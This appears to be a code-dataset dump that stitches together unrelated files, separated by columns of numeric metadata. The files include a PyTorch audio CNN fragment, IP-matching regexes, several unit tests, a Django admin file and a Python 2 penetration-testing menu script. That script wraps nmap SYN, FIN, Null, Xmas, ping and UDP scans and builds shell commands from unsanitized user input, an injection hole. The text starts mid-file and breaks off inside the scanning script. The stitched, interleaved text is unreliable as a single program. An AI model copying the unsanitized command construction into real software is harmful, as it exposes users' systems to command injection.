        self.dropout = torch.nn.Dropout(p=dp_rate)
        # Initialization: scale weights by 1/sqrt(fan-in); zero biases if enabled
        for m in self.modules():
            if isinstance(m, nn.Conv1d) or isinstance(m, nn.Linear):
                m.weight.data.normal_(0, torch.prod(torch.Tensor(list(m.weight.shape)[1:]))**(-1/2))
                if use_bias: m.bias.data.fill_(0.0)

    def forward(self, x):
        """Forward pass: (batch, 1, samples) -> (batch, n_classes) logits."""
        # Conv-layers
        # We replace strided convolutions with normal convolutions followed by max pooling.
        # -----
        out = self.c1(x)
        out = self.pool(out, kernel_size=2, stride=2, padding=0)
        out = self.bn1(torch.relu(out))
        # -----
        out = self.pool(out, kernel_size=8, stride=8, padding=0)
        # -----
        out = self.c2(out)
        out = self.pool(out, kernel_size=2, stride=2, padding=0)
        out = self.bn2(torch.relu(out))
        # -----
        out = self.pool(out, kernel_size=8, stride=8, padding=0)
        # -----
        out = self.c3(out)
        out = self.pool(out, kernel_size=2, stride=2, padding=0)
        out = self.bn3(torch.relu(out))
        # -----
        out = self.c4(out)
        out = self.pool(out, kernel_size=2, stride=2, padding=0)
        out = self.bn4(torch.relu(out))
        # -----
        out = self.c5(out)
        out = self.pool(out, kernel_size=2, stride=2, padding=0)
        out = self.bn5(torch.relu(out))
        # -----
        out = self.pool(out, kernel_size=5, stride=5, padding=0)
        # -----
        # Fully connected lyrs
        out = out.view(out.size(0), -1)
        out = self.dropout(self.f1(out))
        out = self.dropout(self.f2(out))
        out = self.f3(out)
        return out
if __name__ == '__main__':
    from experiments.utils import num_params
    # Sanity check: instantiate each model, report its parameter count, and
    # (for OneDCNN) run a forward pass on a dummy 64000-sample batch.
    print('OneDCNN')
    model = OneDCNN()
    num_params(model)
    model(torch.rand([2, 1, 64000]))
    # Sanity check (parameter count only)
    print('RR+_OneDCNN')
    model = RRPlus_OneDCNN()
    num_params(model)
    # NOTE(review): the forward pass is left commented out — presumably a
    # shape/size issue at this input length; confirm before re-enabling.
    #model(torch.rand([2, 1, 50999]))
| 42.865922
| 173
| 0.615405
| 1,151
| 7,673
| 3.913988
| 0.139878
| 0.079911
| 0.075472
| 0.034184
| 0.83485
| 0.802886
| 0.790233
| 0.723418
| 0.706548
| 0.662375
| 0
| 0.04288
| 0.252313
| 7,673
| 178
| 174
| 43.106742
| 0.742374
| 0.082497
| 0
| 0.474138
| 0
| 0
| 0.004285
| 0
| 0
| 0
| 0
| 0.005618
| 0
| 1
| 0.034483
| false
| 0
| 0.043103
| 0
| 0.112069
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a89d76b501fc8c3eb7152f728483f5cfba44a0a8
| 1,425
|
py
|
Python
|
Python/libraries/recognizers-sequence/recognizers_sequence/resources/chinese_ip.py
|
AhmedLeithy/Recognizers-Text
|
f5426e38a09d3974fc0979b7803a4cd17258ea62
|
[
"MIT"
] | 688
|
2019-05-08T02:56:21.000Z
|
2022-03-30T07:26:15.000Z
|
Python/libraries/recognizers-sequence/recognizers_sequence/resources/chinese_ip.py
|
AhmedLeithy/Recognizers-Text
|
f5426e38a09d3974fc0979b7803a4cd17258ea62
|
[
"MIT"
] | 840
|
2019-05-07T07:00:02.000Z
|
2022-03-30T14:52:11.000Z
|
Python/libraries/recognizers-sequence/recognizers_sequence/resources/chinese_ip.py
|
AhmedLeithy/Recognizers-Text
|
f5426e38a09d3974fc0979b7803a4cd17258ea62
|
[
"MIT"
] | 283
|
2019-05-07T07:52:12.000Z
|
2022-03-27T02:27:58.000Z
|
# ------------------------------------------------------------------------------
# <auto-generated>
# This code was generated by a tool.
# Changes to this file may cause incorrect behavior and will be lost if
# the code is regenerated.
# </auto-generated>
#
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# ------------------------------------------------------------------------------
# pylint: disable=line-too-long
from .base_ip import BaseIp
from .chinese_phone_numbers import ChinesePhoneNumbers as PhoneNumbersDefinitions
class ChineseIp:
    # NOTE: this file is generated by a tool (see the header above); any edit
    # made here will be lost on regeneration — change the generator instead.
    # IPv4: dotted quad where each octet matches 0-255, wrapped in the
    # word-boundary patterns borrowed from the Chinese phone-number definitions.
    Ipv4Regex = f'({PhoneNumbersDefinitions.WordBoundariesRegex}(1\\d{{2}}|2[0-4]\\d|25[0-5]|0?[1-9]\\d|0{{0,2}}\\d)((\\.(1\\d{{2}}|2[0-4]\\d|25[0-5]|0?[1-9]\\d|0{{0,2}}\\d)){{3}}){PhoneNumbersDefinitions.EndWordBoundariesRegex})'
    # IPv6 '::' ellipsis forms: a bare '::', a leading ':(:group)+', or a
    # trailing '(group:)+:' — each bounded by non-word/word boundary patterns.
    Ipv6EllipsisRegexOther = f'({PhoneNumbersDefinitions.NonWordBoundariesRegex}::{PhoneNumbersDefinitions.NonWordBoundariesRegex}|{PhoneNumbersDefinitions.NonWordBoundariesRegex}:(:{BaseIp.BasicIpv6Element}){{1,7}}{PhoneNumbersDefinitions.WordBoundariesRegex}|{PhoneNumbersDefinitions.WordBoundariesRegex}({BaseIp.BasicIpv6Element}:){{1,7}}:{PhoneNumbersDefinitions.NonWordBoundariesRegex})'
    # Full IPv6: either the merged form within word boundaries, or one of the
    # ellipsis forms above.
    Ipv6Regex = f'({PhoneNumbersDefinitions.WordBoundariesRegex}{BaseIp.MergedIpv6Regex}{PhoneNumbersDefinitions.WordBoundariesRegex})|({Ipv6EllipsisRegexOther})'
# pylint: enable=line-too-long
| 64.772727
| 392
| 0.680702
| 139
| 1,425
| 6.956835
| 0.517986
| 0.217166
| 0.022751
| 0.008273
| 0.136505
| 0.039297
| 0.039297
| 0.039297
| 0.039297
| 0.039297
| 0
| 0.031794
| 0.072982
| 1,425
| 21
| 393
| 67.857143
| 0.700227
| 0.338947
| 0
| 0
| 1
| 0.333333
| 0.768568
| 0.768568
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a8a5e433ca07963782a527a80f292c759dad5fea
| 1,972
|
py
|
Python
|
test/test_cstestdatagen.py
|
hlatkydavid/vnmrjpy
|
48707a1000dc87e646e37c8bd686e695bd31a61e
|
[
"MIT"
] | null | null | null |
test/test_cstestdatagen.py
|
hlatkydavid/vnmrjpy
|
48707a1000dc87e646e37c8bd686e695bd31a61e
|
[
"MIT"
] | null | null | null |
test/test_cstestdatagen.py
|
hlatkydavid/vnmrjpy
|
48707a1000dc87e646e37c8bd686e695bd31a61e
|
[
"MIT"
] | null | null | null |
import vnmrjpy as vj
import unittest
import glob
import os
class Test_CsTestDataGenerator(unittest.TestCase):
    """Generate compressed-sensing test data from each supported fid type.

    Each test picks the first .fid directory matching a sequence-specific
    glob under ``vj.fids``, undersamples it by a reduction factor, and writes
    the result under ``vj.cs``. The four original near-identical test bodies
    are deduplicated into ``_generate``; test names are unchanged.
    """

    def _generate(self, pattern, red):
        """Run CsTestDataGenerator for the first fid dir matching *pattern*.

        Args:
            pattern (str): glob suffix appended to ``vj.fids``.
            red (int): compressed-sensing reduction factor.
        """
        # directories
        fid_dir = sorted(glob.glob(vj.fids + pattern))[0]
        # strip the trailing 4-char extension (presumably '.fid' — TODO confirm)
        base_dir = os.path.basename(fid_dir)[:-4]
        out_dir = vj.cs + '/' + base_dir + '_red' + str(red) + '.cs'
        # filepaths
        fid = fid_dir + '/fid'
        procpar = fid_dir + '/procpar'
        # generation
        gen = vj.util.CsTestDataGenerator(fid, procpar, reduction=red)
        gen.generate(savedir=out_dir)

    def test_testdatagen_gems(self):
        self._generate('/gems_s*', 4)

    def test_testdatagen_angio(self):
        self._generate('/ge3d_angio*', 8)

    def test_testdatagen_ge3d(self):
        self._generate('/ge3d_s*', 4)

    def test_testdatagen_mems(self):
        self._generate('/mems*', 6)
| 30.8125
| 68
| 0.59432
| 252
| 1,972
| 4.460317
| 0.170635
| 0.085409
| 0.064057
| 0.074733
| 0.86032
| 0.86032
| 0.86032
| 0.86032
| 0.86032
| 0.761566
| 0
| 0.010323
| 0.263185
| 1,972
| 63
| 69
| 31.301587
| 0.763248
| 0.072515
| 0
| 0.634146
| 0
| 0
| 0.06281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.097561
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a8b04281cbde5b29d59d6a4ca1058b0bd5741b5a
| 37
|
py
|
Python
|
sr_apx/vc/exact/__init__.py
|
TiP-internal/structural-rounding
|
5d033c9ce4bcd2aa72bf10976c07f4842dde2b76
|
[
"BSD-3-Clause"
] | 4
|
2019-10-17T02:29:48.000Z
|
2022-02-20T17:03:42.000Z
|
sr_apx/vc/exact/__init__.py
|
TheoryInPractice/structural-rounding
|
0aa961b9c8ecd4fd12f65302f6e95145ccb00cb6
|
[
"BSD-3-Clause"
] | 3
|
2020-02-12T09:06:17.000Z
|
2020-03-01T04:35:29.000Z
|
sr_apx/vc/exact/__init__.py
|
TiP-internal/structural-rounding
|
5d033c9ce4bcd2aa72bf10976c07f4842dde2b76
|
[
"BSD-3-Clause"
] | 1
|
2020-01-14T15:51:50.000Z
|
2020-01-14T15:51:50.000Z
|
from .lib_vc_exact import bip_exact
| 12.333333
| 35
| 0.837838
| 7
| 37
| 4
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 37
| 2
| 36
| 18.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
76aa3d7d672d6a2ecbf3c9815d8ffb50c31a1681
| 195
|
py
|
Python
|
watch/admin.py
|
moharick/KaaRadaMtaani
|
20e805925d07f1be4406aae2ea100b85c82b0262
|
[
"MIT"
] | null | null | null |
watch/admin.py
|
moharick/KaaRadaMtaani
|
20e805925d07f1be4406aae2ea100b85c82b0262
|
[
"MIT"
] | 3
|
2020-02-12T03:16:51.000Z
|
2021-06-10T22:10:51.000Z
|
watch/admin.py
|
moharick/KaaRadaMtaani
|
20e805925d07f1be4406aae2ea100b85c82b0262
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import *
# Register this app's models with the Django admin site.
for model in (UserProfile, Biz, Post, Mtaa):
    admin.site.register(model)
| 21.666667
| 32
| 0.8
| 28
| 195
| 5.571429
| 0.5
| 0.230769
| 0.435897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 195
| 8
| 33
| 24.375
| 0.881356
| 0.133333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
76bbc0095577466a3714f26fdec5af50c670e39f
| 6,901
|
py
|
Python
|
tests/test_remove.py
|
sarvex/ArchiveBox
|
2427e6d3dc377c665f785f1d845da4e5a20b50a0
|
[
"MIT"
] | 6,340
|
2018-12-20T21:12:13.000Z
|
2020-11-23T02:39:32.000Z
|
tests/test_remove.py
|
sarvex/ArchiveBox
|
2427e6d3dc377c665f785f1d845da4e5a20b50a0
|
[
"MIT"
] | 388
|
2018-12-20T07:58:08.000Z
|
2020-11-23T03:20:36.000Z
|
tests/test_remove.py
|
sarvex/ArchiveBox
|
2427e6d3dc377c665f785f1d845da4e5a20b50a0
|
[
"MIT"
] | 439
|
2018-12-21T21:51:47.000Z
|
2020-11-21T21:21:35.000Z
|
import os
import sqlite3
from .fixtures import *
def test_remove_single_page(tmp_path, process, disable_extractors_dict):
    """Removing one URL reports the match and empties the core_snapshot table."""
    os.chdir(tmp_path)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    remove_process = subprocess.run(['archivebox', 'remove', 'http://127.0.0.1:8080/static/example.com.html', '--yes'], capture_output=True)
    assert "Found 1 matching URLs to remove" in remove_process.stdout.decode("utf-8")
    # Verify the snapshot row is gone from the SQLite index.
    conn = sqlite3.connect("index.sqlite3")
    c = conn.cursor()
    count = c.execute("SELECT COUNT() from core_snapshot").fetchone()[0]
    conn.commit()
    conn.close()
    assert count == 0
def test_remove_single_page_filesystem(tmp_path, process, disable_extractors_dict):
    """Removing with --delete also removes the snapshot directory from disk."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    subprocess.run(['archivebox', 'remove', 'http://127.0.0.1:8080/static/example.com.html', '--yes', '--delete'], capture_output=True)
    assert list((tmp_path / "archive").iterdir()) == []
def test_remove_regex(tmp_path, process, disable_extractors_dict):
    """--filter-type=regex with '.*' deletes every snapshot directory."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    subprocess.run(['archivebox', 'remove', '--filter-type=regex', '.*', '--yes', '--delete'], capture_output=True)
    assert list((tmp_path / "archive").iterdir()) == []
def test_remove_exact(tmp_path, process, disable_extractors_dict):
    """--filter-type=exact removes only the snapshot whose URL matches exactly."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    # (dropped the unused ``remove_process`` local — nothing inspected it)
    subprocess.run(['archivebox', 'remove', '--filter-type=exact', 'http://127.0.0.1:8080/static/iana.org.html', '--yes', '--delete'], capture_output=True)
    assert len(list((tmp_path / "archive").iterdir())) == 1
def test_remove_substr(tmp_path, process, disable_extractors_dict):
    """--filter-type=substring removes only snapshots whose URL contains it."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    subprocess.run(['archivebox', 'remove', '--filter-type=substring', 'example.com', '--yes', '--delete'], capture_output=True)
    assert len(list((tmp_path / "archive").iterdir())) == 1
def test_remove_domain(tmp_path, process, disable_extractors_dict):
    """--filter-type=domain removes all snapshots for that host, on disk and in the index."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    # (dropped the unused ``remove_process`` local — nothing inspected it)
    subprocess.run(['archivebox', 'remove', '--filter-type=domain', '127.0.0.1', '--yes', '--delete'], capture_output=True)
    assert len(list((tmp_path / "archive").iterdir())) == 0
    # The SQLite index should be emptied as well.
    conn = sqlite3.connect("index.sqlite3")
    c = conn.cursor()
    count = c.execute("SELECT COUNT() from core_snapshot").fetchone()[0]
    conn.commit()
    conn.close()
    assert count == 0
def test_remove_tag(tmp_path, process, disable_extractors_dict):
    """Snapshots can be removed by tag; removal empties disk and index."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    # Tag every snapshot with a freshly inserted 'test-tag'.
    conn = sqlite3.connect("index.sqlite3")
    c = conn.cursor()
    c.execute("INSERT INTO core_tag (id, name, slug) VALUES (2, 'test-tag', 'test-tag')")
    snapshot_ids = c.execute("SELECT id from core_snapshot")
    c.executemany('INSERT INTO core_snapshot_tags (snapshot_id, tag_id) VALUES (?, 2)', list(snapshot_ids))
    conn.commit()
    # (dropped the unused ``remove_process`` local — nothing inspected it)
    subprocess.run(['archivebox', 'remove', '--filter-type=tag', 'test-tag', '--yes', '--delete'], capture_output=True)
    assert len(list((tmp_path / "archive").iterdir())) == 0
    count = c.execute("SELECT COUNT() from core_snapshot").fetchone()[0]
    conn.commit()
    conn.close()
    assert count == 0
def test_remove_before(tmp_path, process, disable_extractors_dict):
    """--before removes only snapshots with a strictly lower timestamp."""
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
    subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/iana.org.html'], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    conn = sqlite3.connect("index.sqlite3")
    c = conn.cursor()
    # Rows come back DESC, so the first tuple holds the higher timestamp.
    # (Dropped the redundant chained assignment to an unused ``timestamp``
    # local — this now matches test_remove_after.)
    higherts, lowerts = c.execute("SELECT timestamp FROM core_snapshot ORDER BY timestamp DESC").fetchall()
    conn.commit()
    conn.close()
    lowerts = lowerts[0]
    higherts = higherts[0]
    # before is less than, so only the lower snapshot gets deleted
    subprocess.run(['archivebox', 'remove', '--filter-type=regex', '.*', '--yes', '--delete', '--before', higherts], capture_output=True)
    assert not (tmp_path / "archive" / lowerts).exists()
    assert (tmp_path / "archive" / higherts).exists()
def test_remove_after(tmp_path, process, disable_extractors_dict):
    """`archivebox remove --after <ts>` is inclusive (>=): filtering on the
    older snapshot's timestamp removes both snapshots from disk."""
    for url in ('http://127.0.0.1:8080/static/example.com.html',
                'http://127.0.0.1:8080/static/iana.org.html'):
        subprocess.run(['archivebox', 'add', url], capture_output=True, env=disable_extractors_dict)
    assert list((tmp_path / "archive").iterdir()) != []
    conn = sqlite3.connect("index.sqlite3")
    cur = conn.cursor()
    rows = cur.execute("SELECT timestamp FROM core_snapshot ORDER BY timestamp DESC").fetchall()
    conn.commit()
    conn.close()
    # Newest first; keep only the integer-seconds part of each timestamp.
    newest, oldest = (row[0].split(".")[0] for row in rows)
    # after is greater than or equal to, so both snapshots get deleted
    subprocess.run(['archivebox', 'remove', '--filter-type=regex', '.*', '--yes', '--delete', '--after', oldest], capture_output=True)
    assert not (tmp_path / "archive" / oldest).exists()
    assert not (tmp_path / "archive" / newest).exists()
| 51.118519
| 172
| 0.689465
| 933
| 6,901
| 4.947481
| 0.118971
| 0.042461
| 0.113735
| 0.025997
| 0.872184
| 0.852253
| 0.841854
| 0.841854
| 0.830589
| 0.829506
| 0
| 0.037508
| 0.123026
| 6,901
| 134
| 173
| 51.5
| 0.725215
| 0.018113
| 0
| 0.634409
| 0
| 0.010753
| 0.308431
| 0.003396
| 0
| 0
| 0
| 0
| 0.236559
| 1
| 0.096774
| false
| 0
| 0.032258
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76bd2b009fe8016d455684617aedaeea8b7befd3
| 263
|
py
|
Python
|
pfpi/exceptions.py
|
franklintiel/pfig
|
5f2e8851b1517e34c8f8d58d4bc770192cb2784c
|
[
"MIT"
] | 1
|
2019-01-04T12:01:45.000Z
|
2019-01-04T12:01:45.000Z
|
pfpi/exceptions.py
|
franklintiel/pfig
|
5f2e8851b1517e34c8f8d58d4bc770192cb2784c
|
[
"MIT"
] | null | null | null |
pfpi/exceptions.py
|
franklintiel/pfig
|
5f2e8851b1517e34c8f8d58d4bc770192cb2784c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class PfigAttributeError(Exception):
    """
    Exception raised when an attribute is wrong or missing.
    """
    pass
class PfigTransactionError(Exception):
    """
    Exception raised when a transaction has failed.
    """
    pass
| 16.4375
| 57
| 0.638783
| 27
| 263
| 6.222222
| 0.666667
| 0.214286
| 0.285714
| 0.333333
| 0.345238
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005102
| 0.254753
| 263
| 15
| 58
| 17.533333
| 0.852041
| 0.467681
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
4f134118e50400883be8aed80826ef9f04eb6691
| 87
|
py
|
Python
|
src/tfchain/tests/crypto/__init__.py
|
GlenDC/threefold-wallet-electron
|
440662a793d98781eb3bbf415ba8a482abed0288
|
[
"MIT"
] | null | null | null |
src/tfchain/tests/crypto/__init__.py
|
GlenDC/threefold-wallet-electron
|
440662a793d98781eb3bbf415ba8a482abed0288
|
[
"MIT"
] | 201
|
2019-05-20T15:06:05.000Z
|
2019-07-16T12:48:59.000Z
|
src/tfchain/tests/crypto/__init__.py
|
GlenDC/threefold-wallet-electron
|
440662a793d98781eb3bbf415ba8a482abed0288
|
[
"MIT"
] | 1
|
2019-12-20T21:45:39.000Z
|
2019-12-20T21:45:39.000Z
|
import tfchain.tests.crypto.crypto as cryptotest
def tests():
    """Run the crypto test suite from tfchain.tests.crypto.crypto."""
    cryptotest.tests()
| 17.4
| 49
| 0.747126
| 11
| 87
| 5.909091
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149425
| 87
| 4
| 50
| 21.75
| 0.878378
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4f177f0ad5ba7358e30e6147e6fcff09844b9b56
| 48
|
py
|
Python
|
tests/test_fget_invoice.py
|
devorgpl/invoiceconverter
|
8843040e3cb01641ed12e6b66126b6f3d4c2e9b6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_fget_invoice.py
|
devorgpl/invoiceconverter
|
8843040e3cb01641ed12e6b66126b6f3d4c2e9b6
|
[
"Apache-2.0"
] | 3
|
2020-10-21T12:25:12.000Z
|
2020-10-21T12:33:22.000Z
|
tests/test_fget_invoice.py
|
devorgpl/invoiceconverter
|
8843040e3cb01641ed12e6b66126b6f3d4c2e9b6
|
[
"Apache-2.0"
] | null | null | null |
def test_should_get_from_file():
    # Placeholder test: always passes. TODO: assert real invoice-from-file behavior.
    assert True
| 24
| 32
| 0.791667
| 8
| 48
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 48
| 2
| 33
| 24
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4f937cdce482febf55cd7053602d46b0356b7f57
| 40,984
|
py
|
Python
|
Pentesting Framework/mypentestframework.py
|
OSSSP/Easy-Pentesting-Framework
|
306799e4bf4a555a0ca4dfa1b73879ce3d4336f7
|
[
"Apache-2.0"
] | 5
|
2018-01-07T17:11:31.000Z
|
2018-06-05T17:31:07.000Z
|
Pentesting Framework/mypentestframework.py
|
OSSSP/Easy-Pentesting-Framework
|
306799e4bf4a555a0ca4dfa1b73879ce3d4336f7
|
[
"Apache-2.0"
] | null | null | null |
Pentesting Framework/mypentestframework.py
|
OSSSP/Easy-Pentesting-Framework
|
306799e4bf4a555a0ca4dfa1b73879ce3d4336f7
|
[
"Apache-2.0"
] | 1
|
2019-01-14T17:46:10.000Z
|
2019-01-14T17:46:10.000Z
|
#!/usr/bin/python
import subprocess
import time, sys
import os
global wifi
global eth
global name
class bcolors:
    # ANSI terminal escape sequences used for colored/bold console output.
    HEADER = '\033[95m'     # bright magenta
    OKBLUE = '\033[94m'     # blue
    OKGREEN = '\033[92m'    # green
    WARNING = '\033[93m'    # yellow
    FAIL = '\033[91m'       # red
    ENDC = '\033[0m'        # reset all attributes
    BOLD = '\033[1m'        # bold
    UNDERLINE = '\033[4m'   # underline
def banner(name,length):
    # Print `name` centered inside a box of '*' characters, in bold red.
    # `length` is expected to be len(name) (callers pass it precomputed).
    print bcolors.HEADER+bcolors.BOLD+bcolors.FAIL+"*" * (length + 4)
    print "*"," "*len(name),"*"
    print "*", name, "*"
    print "*"," "*len(name),"*"
    print "*" * (length + 4) +bcolors.ENDC
def verifyhost(ipaddr):
    # Return 1 when a single ping to `ipaddr` fails, 0 when it succeeds
    # (callers loop `while verifyhost(ip):` to re-prompt on failure).
    # NOTE(review): `Command` is a project helper defined elsewhere in this
    # file; it appears to expose .error/.output after .run() -- confirm.
    com=Command("ping -c 1 " + ipaddr).run()
    if com.error:
        return 1
    else:
        return 0
def basicscan(ipaddr):
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"\n[*] Choose your scan type: "+bcolors.ENDC
mychoice=raw_input("\n\n1) TCP Connect\n2) SYN Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
if (mychoice.isdigit()) and (len(mychoice) == 1):
dict = {'1': '-sT', '2': '-sS'}
com = Command("nmap "+ipaddr+" "+dict[mychoice]+" "+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+ com.error + bcolors.ENDC
else:
print bcolors.FAIL +bcolors.BOLD+ "\n[-] Error: Please note that multiple scans of this type cannot be performed simultaneously"+ bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def advancedscan(ipaddr):
os.system('clear')
print bcolors.HEADER + bcolors.BOLD+"Choose your scan type: "+bcolors.ENDC
dict = {'1': '-sF', '2': '-sN', '3': '-sX'}
mychoice=raw_input("\n\n1) FIN Scan\n2) Null Scan\n3) Xmas Tree Scan\n\n"+bcolors.HEADER + bcolors.BOLD+"[*] Choose one option: "+bcolors.ENDC)
if (mychoice.isdigit()) and (len(mychoice) == 1):
com = Command("nmap "+ipaddr+" "+dict[mychoice]+" "+form+" "+filename).run()
print com.output
if com.error:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+ com.error + bcolors.ENDC
else:
print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: Please note that multiple scans of this type cannot be performed simultaneously"+ bcolors.ENDC
get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
return
def pingscan(ipaddr):
    # nmap ping scan (-sP): host discovery only; output options come from
    # the module-level `form`/`filename` globals.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sP "+form+" "+filename).run()
    print com.output
    if com.error:
        print bcolors.FAIL + bcolors.BOLD+"\n[-] Error: "+ com.error + bcolors.ENDC
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
def udpscan(ipaddr):
    # nmap UDP port scan (-sU) of `ipaddr`; pauses before returning.
    os.system('clear')
    com = Command("nmap "+ipaddr+" -sU "+form+" "+filename).run()
    print com.output
    if com.error:
        print "\n[-] Error: "+com.error
    get = raw_input(bcolors.HEADER+"\n[*] Press any key to return..."+bcolors.ENDC)
    return
